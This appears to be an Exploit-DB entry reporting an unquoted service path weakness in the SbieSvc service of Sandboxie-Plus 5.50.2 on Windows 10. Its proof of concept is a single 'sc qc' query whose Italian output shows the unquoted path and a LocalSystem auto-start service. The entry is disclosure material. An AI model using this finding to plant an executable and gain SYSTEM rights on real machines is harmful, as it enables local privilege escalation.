Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path

EDB-ID:

50819

CVE:

N/A




Platform:

Windows

Date:

2022-03-10


# Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path
# Exploit Author: Antonio Cuomo (arkantolo)
# Exploit Date: 2022-03-09
# Vendor : David Xanatos
# Version : SbieSvc 5.50.2
# Vendor Homepage :  https://sandboxie-plus.com/
# Tested on OS: Windows 10 Pro x64

#PoC :
==============

C:\>sc qc SbieSvc
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: SbieSvc
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files\Sandboxie-Plus\SbieSvc.exe
        GRUPPO_ORDINE_CARICAMENTO : UIGroup
        TAG                       : 0
        NOME_VISUALIZZATO         : Sandboxie Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem